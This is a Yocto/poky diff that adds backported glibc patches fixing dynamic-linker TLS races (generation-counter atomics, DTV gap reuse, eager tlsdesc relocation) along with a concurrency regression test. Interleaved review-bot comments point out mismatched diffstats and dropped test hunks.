of the last synchronized +write is an increasing value. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/dl-close.c | 20 +++++++++++++------- + elf/dl-open.c | 5 ++++- + elf/dl-tls.c | 31 +++++++++++++++++++++++-------- + sysdeps/x86_64/dl-tls.c | 3 ++- + 4 files changed, 42 insertions(+), 17 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9] +Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index c51becd06b..3720e47dd1 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + { + assert (old_map->l_tls_modid == idx); + +- /* Mark the entry as unused. 
*/ +- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1; +- listp->slotinfo[idx - disp].map = NULL; ++ /* Mark the entry as unused. These can be read concurrently. */ ++ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen, ++ GL(dl_tls_generation) + 1); ++ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL); + } + + /* If this is not the last currently used entry no need to look +@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + + if (listp->slotinfo[idx - disp].map != NULL) + { +- /* Found a new last used index. */ +- GL(dl_tls_max_dtv_idx) = idx; ++ /* Found a new last used index. This can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx); + return true; + } + } +@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force) + GL(dl_tls_dtv_slotinfo_list), 0, + imap->l_init_called)) + /* All dynamically loaded modules with TLS are unloaded. */ +- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), ++ GL(dl_tls_static_nelem)); + + if (imap->l_tls_offset != NO_TLS_OFFSET + && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET) +@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force) + /* If we removed any object which uses TLS bump the generation counter. */ + if (any_tls) + { +- if (__glibc_unlikely (++GL(dl_tls_generation) == 0)) ++ size_t newgen = GL(dl_tls_generation) + 1; ++ if (__glibc_unlikely (newgen == 0)) + _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n"); ++ /* Can be read concurrently. 
*/ ++ atomic_store_relaxed (&GL(dl_tls_generation), newgen); + + if (tls_free_end == GL(dl_tls_static_used)) + GL(dl_tls_static_used) = tls_free_start; +diff --git a/elf/dl-open.c b/elf/dl-open.c +index 09f0df7d38..bb79ef00f1 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -387,9 +387,12 @@ + } + } + +- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0)) ++ size_t newgen = GL(dl_tls_generation) + 1; ++ if (__glibc_unlikely (newgen == 0)) + _dl_fatal_printf (N_("\ + TLS generation counter wrapped! Please report this.")); ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_generation), newgen); + + /* We need a second pass for static tls data, because + _dl_update_slotinfo must not be run while calls to +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 94f3cdbae0..dc69cd984e 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -96,7 +96,9 @@ + /* No gaps, allocate a new entry. */ + nogaps: + +- result = ++GL(dl_tls_max_dtv_idx); ++ result = GL(dl_tls_max_dtv_idx) + 1; ++ /* Can be read concurrently. */ ++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result); + } + + return result; +@@ -279,10 +281,12 @@ + dtv_t *dtv; + size_t dtv_length; + ++ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */ ++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx)); + /* We allocate a few more elements in the dtv than are needed for the + initial set of modules. This should avoid in most cases expansions + of the dtv. */ +- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS; ++ dtv_length = max_modid + DTV_SURPLUS; + dtv = calloc (dtv_length + 2, sizeof (dtv_t)); + if (dtv != NULL) + { +@@ -687,7 +691,7 @@ + if (modid > max_modid) + break; + +- size_t gen = listp->slotinfo[cnt].gen; ++ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen); + + if (gen > new_gen) + /* Not relevant. */ +@@ -699,7 +703,8 @@ + continue; + + /* If there is no map this means the entry is empty. 
*/ +- struct link_map *map = listp->slotinfo[cnt].map; ++ struct link_map *map ++ = atomic_load_relaxed (&listp->slotinfo[cnt].map); + /* Check whether the current dtv array is large enough. */ + if (dtv[-1].counter < modid) + { +@@ -843,7 +848,12 @@ + { + dtv_t *dtv = THREAD_DTV (); + +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ /* Update is needed if dtv[0].counter < the generation of the accessed ++ module. The global generation counter is used here as it is easier ++ to check. Synchronization for the relaxed MO access is guaranteed ++ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */ ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + return update_get_addr (GET_ADDR_PARAM); + + void *p = dtv[GET_ADDR_MODULE].pointer.val; +@@ -866,7 +876,10 @@ + return NULL; + + dtv_t *dtv = THREAD_DTV (); +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ /* This may be called without holding the GL(dl_load_lock). Reading ++ arbitrary gen value is fine since this is best effort code. */ ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + { + /* This thread's DTV is not completely current, + but it might already cover this module. */ +@@ -961,7 +974,9 @@ + /* Add the information into the slotinfo data structure. */ + if (do_add) + { +- listp->slotinfo[idx].map = l; +- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1; ++ /* Can be read concurrently. See _dl_update_slotinfo. 
*/ ++ atomic_store_relaxed (&listp->slotinfo[idx].map, l); ++ atomic_store_relaxed (&listp->slotinfo[idx].gen, ++ GL(dl_tls_generation) + 1); + } + } + +diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c +index 6595f6615b..24ef560b71 100644 +--- a/sysdeps/x86_64/dl-tls.c ++++ b/sysdeps/x86_64/dl-tls.c +@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS) + { + dtv_t *dtv = THREAD_DTV (); + +- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation))) ++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); ++ if (__glibc_unlikely (dtv[0].counter != gen)) + return update_get_addr (GET_ADDR_PARAM); + + return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL); +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch new file mode 100644 index 0000000000..f22e52ea99 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch 
@@ -0,0 +1,144 @@ +From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Tue, 13 Dec 2016 12:28:41 +0000 +Subject: [PATCH] elf: Add test case for [BZ #19329] + +Test concurrent dlopen and pthread_create when the loaded modules have +TLS. This triggers dl-tls assertion failures more reliably than the +nptl/tst-stack4 test. + +The dlopened module has 100 DT_NEEDED dependencies with TLS, they were +reused from an existing TLS test. The number of created threads during +dlopen depends on filesystem speed and hardware, but at most 3 threads +are alive at a time to limit resource usage. + +Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org> +--- + elf/Makefile | 9 ++++-- + elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++ + elf/tst-tls21mod.c | 1 + + 3 files changed, 76 insertions(+), 2 deletions(-) + create mode 100644 elf/tst-tls21.c + create mode 100644 elf/tst-tls21mod.c +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce] +Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase. 
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/Makefile b/elf/Makefile +index d3e909637a..3241cb6046 100644 +--- a/elf/Makefile ++++ b/elf/Makefile +@@ -201,7 +201,7 @@ + tst-unwind-ctor tst-unwind-main tst-audit13 \ + tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \ + tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \ +- tst-dlopenfail-2 ++ tst-dlopenfail-2 tst-tls21 + # reldep9 + tests-internal += loadtest unload unload2 circleload1 \ + neededtest neededtest2 neededtest3 neededtest4 \ +@@ -312,7 +312,7 @@ + tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \ + tst-initlazyfailmod tst-finilazyfailmod \ + tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \ +- tst-dlopenfailmod3 tst-ldconfig-ld-mod ++ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod + # Most modules build with _ISOMAC defined, but those filtered out + # depend on internal headers. + modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\ +@@ -1697,5 +1697,10 @@ + $(objpfx)tst-dlopen-nodelete-reloc-mod16.so + LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed + ++# Reuses tst-tls-many-dynamic-modules ++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library) ++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so ++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so) ++ + $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so + $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl) +diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c +new file mode 100644 +index 0000000000..560bf5813a +--- /dev/null ++++ b/elf/tst-tls21.c +@@ -0,0 +1,68 @@ ++/* Test concurrent dlopen and pthread_create: BZ 19329. ++ Copyright (C) 2021 Free Software Foundation, Inc. ++ This file is part of the GNU C Library. 
++ ++ The GNU C Library is free software; you can redistribute it and/or ++ modify it under the terms of the GNU Lesser General Public ++ License as published by the Free Software Foundation; either ++ version 2.1 of the License, or (at your option) any later version. ++ ++ The GNU C Library is distributed in the hope that it will be useful, ++ but WITHOUT ANY WARRANTY; without even the implied warranty of ++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ++ Lesser General Public License for more details. ++ ++ You should have received a copy of the GNU Lesser General Public ++ License along with the GNU C Library; if not, see ++ <http://www.gnu.org/licenses/>. */ ++ ++#include <dlfcn.h> ++#include <pthread.h> ++#include <stdio.h> ++#include <stdatomic.h> ++#include <support/xdlfcn.h> ++#include <support/xthread.h> ++ ++#define THREADS 10000 ++ ++static atomic_int done; ++ ++static void * ++start (void *a) ++{ ++ /* Load a module with many dependencies that each have TLS. */ ++ xdlopen ("tst-tls21mod.so", RTLD_LAZY); ++ atomic_store_explicit (&done, 1, memory_order_release); ++ return 0; ++} ++ ++static void * ++nop (void *a) ++{ ++ return 0; ++} ++ ++static int ++do_test (void) ++{ ++ pthread_t t1, t2; ++ int i; ++ ++ /* Load a module with lots of dependencies and TLS. */ ++ t1 = xpthread_create (0, start, 0); ++ ++ /* Concurrently create lots of threads until dlopen is observably done. */ ++ for (i = 0; i < THREADS; i++) ++ { ++ if (atomic_load_explicit (&done, memory_order_acquire) != 0) ++ break; ++ t2 = xpthread_create (0, nop, 0); ++ xpthread_join (t2); ++ } ++ ++ xpthread_join (t1); ++ printf ("threads created during dlopen: %d\n", i); ++ return 0; ++} ++ ++#include <support/test-driver.c> +diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c +new file mode 100644 +index 0000000000..206ece4fb3 +--- /dev/null ++++ b/elf/tst-tls21mod.c +@@ -0,0 +1 @@ ++int __thread x; +-- +2.27.0 
diff --git a/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/poky/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@ +From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001 +From: Adhemerval Zanella <adhemerval.zanella@linaro.org> +Date: Fri, 25 Jun 2021 10:54:12 -0300 +Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135) + +This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2) +that fixes the _dl_next_tls_modid issues. + +This issue with 572bd547d57a patch is the DTV entry will be only +update on dl_open_worker() with the update_tls_slotinfo() call after +all dependencies are being processed by _dl_map_object_deps(). However +_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since +the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be +wrongly reused. + +This patch fixes by renaming the _dl_next_tls_modid() function to +_dl_assign_tls_modid() and by passing the link_map so it can set +the slotinfo value so a subsequente _dl_next_tls_modid() call will +see the entry as allocated. + +The intermediary value is cleared up on remove_slotinfo() for the case +a library fails to load with RTLD_NOW. + +This patch fixes BZ #27135. + +Checked on x86_64-linux-gnu. + +Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com> +--- + elf/dl-close.c | 8 +- + elf/dl-load.c | 2 +- + elf/dl-open.c | 10 -- + elf/dl-tls.c | 17 +-- + elf/rtld.c | 2 +- + sysdeps/generic/ldsodefs.h | 4 +- + 6 files changed, 349 insertions(+), 33 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce] +Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed. +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index 3720e47dd1..f39001cab9 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + object that wasn't fully set up. 
*/ + if (__glibc_likely (old_map != NULL)) + { +- assert (old_map->l_tls_modid == idx); +- + /* Mark the entry as unused. These can be read concurrently. */ + atomic_store_relaxed (&listp->slotinfo[idx - disp].gen, + GL(dl_tls_generation) + 1); +@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp, + /* If this is not the last currently used entry no need to look + further. */ + if (idx != GL(dl_tls_max_dtv_idx)) +- return true; ++ { ++ /* There is an unused dtv entry in the middle. */ ++ GL(dl_tls_dtv_gaps) = true; ++ return true; ++ } + } + + while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0)) +diff --git a/elf/dl-load.c b/elf/dl-load.c +index a08df001af..650e4edc35 100644 +--- a/elf/dl-load.c ++++ b/elf/dl-load.c +@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires"); + not set up TLS data structures, so don't use them now. */ + || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL))) + /* Assign the next available module ID. */ +- l->l_tls_modid = _dl_next_tls_modid (); ++ _dl_assign_tls_modid (l); + + #ifdef DL_AFTER_LOAD + DL_AFTER_LOAD (l); +diff --git a/elf/dl-open.c b/elf/dl-open.c +index a066f39bd0..d2240d8747 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()")); + state if relocation failed, for example. */ + if (args.map) + { +- /* Maybe some of the modules which were loaded use TLS. +- Since it will be removed in the following _dl_close call +- we have to mark the dtv array as having gaps to fill the +- holes. This is a pessimistic assumption which won't hurt +- if not true. There is no need to do this when we are +- loading the auditing DSOs since TLS has not yet been set +- up. 
*/ +- if ((mode & __RTLD_AUDIT) == 0) +- GL(dl_tls_dtv_gaps) = true; +- + _dl_close_worker (args.map, true); + + /* All l_nodelete_pending objects should have been deleted +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index 2b5161d10a..423e380f7c 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -126,8 +126,8 @@ oom (void) + } + + +-size_t +-_dl_next_tls_modid (void) ++void ++_dl_assign_tls_modid (struct link_map *l) + { + size_t result; + +@@ -157,7 +157,11 @@ _dl_next_tls_modid (void) + } + + if (result - disp < runp->len) +- break; ++ { ++ /* Mark the entry as used, so any dependency see it. */ ++ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l); ++ break; ++ } + + disp += runp->len; + } +@@ -184,17 +188,14 @@ _dl_next_tls_modid (void) + atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result); + } + +- return result; ++ l->l_tls_modid = result; + } + + + size_t + _dl_count_modids (void) + { +- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where +- we fail to load a module and unload it leaving a gap. If we don't +- have gaps then the number of modids is the current maximum so +- return that. */ ++ /* The count is the max unless dlclose or failed dlopen created gaps. */ + if (__glibc_likely (!GL(dl_tls_dtv_gaps))) + return GL(dl_tls_max_dtv_idx); + +diff --git a/elf/rtld.c b/elf/rtld.c +index e3fb2a5b2a..d733359eaf 100644 +--- a/elf/rtld.c ++++ b/elf/rtld.c +@@ -1612,7 +1612,7 @@ + /* Add the dynamic linker to the TLS list if it also uses TLS. */ + if (GL(dl_rtld_map).l_tls_blocksize != 0) + /* Assign a module ID. Do this before loading any audit modules. */ +- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid (); ++ _dl_assign_tls_modid (&GL(dl_rtld_map)); + + /* If we have auditing DSOs to load, do it now. 
*/ + bool need_security_init = true; +diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h +index 176394de4d..9c15259236 100644 +--- a/sysdeps/generic/ldsodefs.h ++++ b/sysdeps/generic/ldsodefs.h +@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr, + extern void _dl_sysdep_start_cleanup (void) attribute_hidden; + + +-/* Determine next available module ID. */ +-extern size_t _dl_next_tls_modid (void) attribute_hidden; ++/* Determine next available module ID and set the L l_tls_modid. */ ++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden; + + /* Count the modules with TLS segments. */ + extern size_t _dl_count_modids (void) attribute_hidden; +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch new file mode 100644 index 0000000000..899111b118 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch 
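Review bot: The header of 0034 says the test hunks were removed, so nothing carried in this patch exercises the refreshed `_dl_assign_tls_modid` path against the glibc 2.31 code, although the bug it fixes is a TLS slot being "wrongly reused". The diffstat kept from upstream (`6 files changed, 349 insertions(+), 33 deletions(-)`) also no longer matches the hunks that follow it. I would regenerate the diffstat and extend the comment to say why the tests were dropped, along the lines of `Comment: Removed test hunks (<reason>); elf/rtld.c hunk refreshed for 2.31.` The same applies to 0037, whose header says "Removed test case" and still reports `10 files changed` while listing seven.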
@@ -0,0 +1,56 @@ +From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Thu, 11 Feb 2021 11:29:23 +0000 +Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137] + +Lazy tlsdesc relocation is racy because the static tls optimization and +tlsdesc management operations are done without holding the dlopen lock. + +This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67 +for aarch64, but it fixes a different race: bug 27137. + +Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to +relocate tlsdesc lazily, but that does not work in a BIND_NOW module +due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at +load time fixes this bug 27721 too. +--- + sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++----- + 1 file changed, 14 insertions(+), 5 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h +index 103eee6c3f..9a876a371e 100644 +--- a/sysdeps/x86_64/dl-machine.h ++++ b/sysdeps/x86_64/dl-machine.h +@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map, + } + else if (__glibc_likely (r_type == R_X86_64_TLSDESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; ++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info); ++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]); ++ const ElfW (Sym) *sym = &symtab[symndx]; ++ const struct r_found_version *version = NULL; + +- td->arg = (void*)reloc; +- td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)]) +- + map->l_addr); ++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL) ++ { ++ const ElfW (Half) *vernum = ++ (const void *)D_PTR (map, 
l_info[VERSYMIDX (DT_VERSYM)]); ++ version = &map->l_versions[vernum[symndx] & 0x7fff]; ++ } ++ ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ ++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc); + } + else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE)) + { +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch new file mode 100644 index 0000000000..ad0a1147aa --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch 
@@ -0,0 +1,124 @@ +From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001 +From: Szabolcs Nagy <szabolcs.nagy@arm.com> +Date: Thu, 11 Feb 2021 11:40:11 +0000 +Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137] + +Lazy tlsdesc relocation is racy because the static tls optimization and +tlsdesc management operations are done without holding the dlopen lock. + +This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67 +for aarch64, but it fixes a different race: bug 27137. + +On i386 the code is a bit more complicated than on x86_64 because both +rel and rela relocs are supported. +--- + sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++--------------------- + 1 file changed, 34 insertions(+), 42 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d] +Signed-off-by: Akash Hadke <akash.hadke@kpit.com> +Signed-off-by: Akash Hadke <hadkeakash4@gmail.com> +--- +diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h +index 23e9cc3bfb..590b41d8d7 100644 +--- a/sysdeps/i386/dl-machine.h ++++ b/sysdeps/i386/dl-machine.h +@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map, + } + else if (__glibc_likely (r_type == R_386_TLS_DESC)) + { +- struct tlsdesc volatile * __attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; +- +- /* Handle relocations that reference the local *ABS* in a simple +- way, so as to preserve a potential addend. */ +- if (ELF32_R_SYM (reloc->r_info) == 0) +- td->entry = _dl_tlsdesc_resolve_abs_plus_addend; +- /* Given a known-zero addend, we can store a pointer to the +- reloc in the arg position. */ +- else if (td->arg == 0) +- { +- td->arg = (void*)reloc; +- td->entry = _dl_tlsdesc_resolve_rel; +- } +- else +- { +- /* We could handle non-*ABS* relocations with non-zero addends +- by allocating dynamically an arg to hold a pointer to the +- reloc, but that sounds pointless. 
*/ +- const Elf32_Rel *const r = reloc; +- /* The code below was borrowed from elf_dynamic_do_rel(). */ +- const ElfW(Sym) *const symtab = +- (const void *) D_PTR (map, l_info[DT_SYMTAB]); ++ const Elf32_Rel *const r = reloc; ++ /* The code below was borrowed from elf_dynamic_do_rel(). */ ++ const ElfW(Sym) *const symtab = ++ (const void *) D_PTR (map, l_info[DT_SYMTAB]); + ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ + # ifdef RTLD_BOOTSTRAP +- /* The dynamic linker always uses versioning. */ +- assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL); ++ /* The dynamic linker always uses versioning. */ ++ assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL); + # else +- if (map->l_info[VERSYMIDX (DT_VERSYM)]) ++ if (map->l_info[VERSYMIDX (DT_VERSYM)]) + # endif +- { +- const ElfW(Half) *const version = +- (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); +- ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff; +- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], +- &map->l_versions[ndx], +- (void *) (l_addr + r->r_offset), skip_ifunc); +- } ++ { ++ const ElfW(Half) *const version = ++ (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff; ++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], ++ &map->l_versions[ndx], ++ (void *) (l_addr + r->r_offset), skip_ifunc); ++ } + # ifndef RTLD_BOOTSTRAP +- else +- elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL, +- (void *) (l_addr + r->r_offset), skip_ifunc); ++ else ++ elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL, ++ (void *) (l_addr + r->r_offset), skip_ifunc); + # endif +- } + } + else if (__glibc_unlikely (r_type == R_386_IRELATIVE)) + { +@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map, + ; + else if (__glibc_likely (r_type == R_386_TLS_DESC)) + { +- struct tlsdesc volatile * 
__attribute__((__unused__)) td = +- (struct tlsdesc volatile *)reloc_addr; ++ const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info); ++ const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]); ++ const ElfW (Sym) *sym = &symtab[symndx]; ++ const struct r_found_version *version = NULL; ++ ++ if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL) ++ { ++ const ElfW (Half) *vernum = ++ (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]); ++ version = &map->l_versions[vernum[symndx] & 0x7fff]; ++ } + +- td->arg = (void*)reloc; +- td->entry = _dl_tlsdesc_resolve_rela; ++ /* Always initialize TLS descriptors completely at load time, in ++ case static TLS is allocated for it that requires locking. */ ++ elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc); + } + else if (__glibc_unlikely (r_type == R_386_IRELATIVE)) + { +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch new file mode 100644 index 0000000000..7a10131bad --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch 
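Review bot: With both `R_386_TLS_DESC` branches now relocating eagerly, this patch drops every visible assignment of `_dl_tlsdesc_resolve_rel`, `_dl_tlsdesc_resolve_abs_plus_addend` and `_dl_tlsdesc_resolve_rela`, and the header does not say what becomes of those resolvers. If nothing else in the 2.31 tree references them, they presumably remain in ld.so as unreachable lazy-resolution code; that should be confirmed and recorded, e.g. `Comment: lazy tlsdesc resolvers left in place, now unused (removal not backported).` The same question applies to the `DT_TLSDESC_PLT` entry path removed in 0035 for x86_64. Both `elf_machine_lazy_rel` and `elf_machine_lazy_rela` continue outside the hunks.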
